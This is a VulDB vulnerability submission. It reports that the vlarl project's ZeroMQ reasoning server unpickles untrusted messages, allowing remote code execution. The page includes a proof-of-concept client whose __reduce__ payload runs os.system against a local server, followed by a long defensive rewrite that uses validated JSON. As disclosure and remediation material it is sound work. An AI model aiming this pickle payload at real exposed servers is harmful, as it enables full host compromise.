Submission #653279: vlarl latest Insecure Deserialization (leads to Remote Code Execution) Info

Title: vlarl latest Insecure Deserialization (leads to Remote Code Execution)
Description:

# Security Report: Remote Code Execution Vulnerability in `experiments.robot.bridge.reasoning_server::run_reasoning_server`

### Summary

A critical Remote Code Execution (RCE) vulnerability exists in `experiments.robot.bridge.reasoning_server::run_reasoning_server`. The server accepts incoming messages and deserializes them using `pickle.loads`, which allows attackers to execute arbitrary code on the host system.

### Details

The vulnerable code is located at: [experiments.robot.bridge.reasoning_server::run_reasoning_server](https://github.com/GuanxingLu/vlarl/blob/main/experiments/robot/bridge/reasoning_server.py#L64-L86)

The server listens for incoming messages via ZeroMQ (`zmq`). Received data is deserialized using `pickle.loads(message)`:

```python
while True:
    message = socket.recv()
    inputs = pickle.loads(message)  # Unsafe deserialization of an untrusted frame
    result = model.raw_generate(*inputs)
    socket.send(pickle.dumps(result))
```

`pickle` is inherently unsafe for untrusted data. Attackers can craft malicious payloads that execute arbitrary code during deserialization.

### Proof of Concept (PoC)

1. Start the vulnerable server:

```shell
PYTHONPATH=. python3 experiments/robot/bridge/reasoning_server.py
```

2. Run the following client code to send a malicious payload:

```python
import pickle, zmq

class Payload(object):
    def __reduce__(self):
        import os
        return (os.system, ('echo "hacked"',))

context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect("tcp://127.0.0.1:5623")
socket.send(pickle.dumps(Payload()))
```

3. The server will execute `os.system('echo "hacked"')`, demonstrating remote code execution.

### Impact

- Attackers can remotely execute arbitrary system commands, leading to full server compromise.
- This may result in data theft, service disruption, ransomware, or further attacks on internal infrastructure.
### Recommendation

- **Never use `pickle.loads` on data from untrusted sources.**
- Replace `pickle` with a safe serialization format such as JSON or MessagePack, and strictly validate all inputs.

### References

- [Python pickle documentation (Security Considerations)](https://docs.python.org/3/library/pickle.html#security-concerns)
- [OWASP: Deserialization of Untrusted Data](https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data)
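As an added illustration of the recommendation above (this is example code written for this page, not code from the vlarl project or from the report), the following Python replaces the `pickle.loads` call with JSON decoding plus explicit schema validation. JSON can only carry plain data, so there is no equivalent of `__reduce__` for a client to abuse. The wire format (`{"args": [...]}`), the size and argument limits, the `InvalidRequest` exception, `serve_once` and the `FakeSocket` used for an offline demo are all assumptions made for the example; a real deployment would hand the validated arguments to `model.raw_generate` instead of the demo handler.

```python
import json
import pickle  # used only to construct a benign frame that the decoder must reject
from typing import Any, Callable

MAX_MESSAGE_BYTES = 64 * 1024   # hypothetical cap on a single request frame
MAX_ARGS = 8                    # hypothetical cap on positional arguments
MAX_STRING_CHARS = 4096         # hypothetical cap on any single string argument


class InvalidRequest(ValueError):
    """Raised for any frame that is not well-formed, schema-conforming JSON."""


def reject_constant(name: str) -> Any:
    # json.loads would otherwise accept NaN/Infinity/-Infinity, which are not JSON.
    raise InvalidRequest(f"non-standard JSON constant {name!r} is not allowed")


def check_scalar(value: Any, path: str) -> None:
    """Allow only plain scalars: str, int, float, bool, None. No nesting, no objects."""
    if value is None or isinstance(value, (bool, int, float)):
        return
    if isinstance(value, str):
        if len(value) > MAX_STRING_CHARS:
            raise InvalidRequest(f"{path}: string longer than {MAX_STRING_CHARS} chars")
        return
    raise InvalidRequest(f"{path}: unsupported type {type(value).__name__}")


def decode_request(frame: bytes) -> list:
    """Safe replacement for `inputs = pickle.loads(message)`.

    The frame must be UTF-8 JSON of the form {"args": [scalar, ...]}. Anything else,
    including a pickle stream (which starts with the byte 0x80 and is not valid
    UTF-8), is rejected before any application code sees it.
    """
    if not isinstance(frame, (bytes, bytearray)):
        raise InvalidRequest("frame must be bytes")
    if len(frame) > MAX_MESSAGE_BYTES:
        raise InvalidRequest(f"frame exceeds {MAX_MESSAGE_BYTES} bytes")
    try:
        payload = json.loads(frame.decode("utf-8"), parse_constant=reject_constant)
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise InvalidRequest(f"frame is not UTF-8 JSON: {exc}") from None
    if not isinstance(payload, dict) or set(payload) != {"args"}:
        raise InvalidRequest('request must be an object with exactly one key, "args"')
    args = payload["args"]
    if not isinstance(args, list):
        raise InvalidRequest('"args" must be a list')
    if len(args) > MAX_ARGS:
        raise InvalidRequest(f'"args" has more than {MAX_ARGS} entries')
    for index, value in enumerate(args):
        check_scalar(value, f"args[{index}]")
    return args


def encode_response(result: Any) -> bytes:
    """Safe replacement for `pickle.dumps(result)`.

    json.dumps raises TypeError for anything that is not plain data, which is the
    behaviour we want: the server must never emit objects a client would unpickle.
    """
    return json.dumps({"result": result}).encode("utf-8")


def serve_once(socket: Any, handler: Callable[..., Any]) -> bytes:
    """One REQ/REP round trip: decode, dispatch, encode.

    Malformed input becomes a JSON error reply rather than a crash or a code path
    into pickle. Returns the reply bytes so callers (and tests) can inspect them.
    """
    frame = socket.recv()
    try:
        reply = encode_response(handler(*decode_request(frame)))
    except (InvalidRequest, TypeError) as exc:
        reply = json.dumps({"error": str(exc)}).encode("utf-8")
    socket.send(reply)
    return reply


def rejects(frame: bytes) -> bool:
    """True if decode_request refuses the frame with InvalidRequest."""
    try:
        decode_request(frame)
    except InvalidRequest:
        return True
    return False


class FakeSocket:
    """Minimal stand-in for a zmq REP socket so the example runs offline."""

    def __init__(self, frame: bytes) -> None:
        self.frame = frame
        self.sent = b""

    def recv(self) -> bytes:
        return self.frame

    def send(self, data: bytes) -> None:
        self.sent = data


# Constructed sample frames: a benign pickle of a list, and a well-formed JSON request.
CONSTRUCTED_PICKLE_FRAME = pickle.dumps(["harmless"])
CONSTRUCTED_JSON_FRAME = b'{"args": ["a", 2]}'

if __name__ == "__main__":
    print(serve_once(FakeSocket(CONSTRUCTED_JSON_FRAME), lambda s, n: s * n))
    print(serve_once(FakeSocket(CONSTRUCTED_PICKLE_FRAME), lambda *a: a))
```

The important design choice is that validation is structural and happens before dispatch: the decoder fixes the exact shape it will accept (one object, one key, a bounded list of bounded scalars) and refuses everything else, so a reviewer can verify the server's trust boundary by reading one function. The same approach applies to MessagePack; what matters is that the codec has no way to name Python callables.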
Source: ⚠️ https://github.com/GuanxingLu/vlarl/issues/18
User: zznQ (UID 64000)
Submitted: 2025-09-12 07:58 (7 months ago)
Moderated: 2025-09-25 16:12 (13 days later)
Status: Accepted
VulDB Entry: 325846 [GuanxingLu vlarl up to 31abc0baf53ef8f5db666a1c882e1ea64def2997 ZeroMQ reasoning_server.py run_reasoning_server Info privilege escalation]
Points: 20
